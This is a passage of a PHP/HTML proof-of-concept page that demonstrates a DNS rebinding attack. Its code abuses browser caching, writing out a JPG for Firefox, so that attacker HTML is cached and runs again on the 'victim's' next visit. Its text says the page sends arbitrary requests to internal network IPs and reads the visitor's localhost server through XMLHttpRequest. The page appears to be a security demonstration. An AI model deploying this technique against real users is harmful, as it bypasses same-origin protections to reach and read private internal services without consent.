tag. header("Content-type: text/html"); //Make the browser to cache this page ("image") for a year header("Cache-Control: max-age=31536000, must-revalidate"); /* Problem: Firefox won't cache invalid images. However, if we output a valid JPG before the HTML code, the file will be seen as valid. Funny thing is that if we ouput the same data to IE, it will neglect the Content-Type and display an image even when the URL is accessed directly (ignoring the HTML). So, we'll output the JPG only if the browser is Firefox. */ if (strstr($_SERVER["HTTP_USER_AGENT"], "Firefox")){ readfile("img.jpg"); } //Now we output the HTML that is going to be cached, and executed on the next visit to this page. //In theory, the PHP code above shouldn't be executed again (per victim). ?>

DNS rebinding PoC

This PoC requires JavaScript.

This PoC shows a way to send arbitraray HTTP requests to your internal netwrok IPs. It uses browser cache and DNS rebinding.
This page can read the contents of your localhost (via XMLHttpRequest). If you have an HTTP server running on 127.0.0.1, here is it's index page:
(if nothing appears here, it proabbly means that you do not have an HTTP server running on port 80)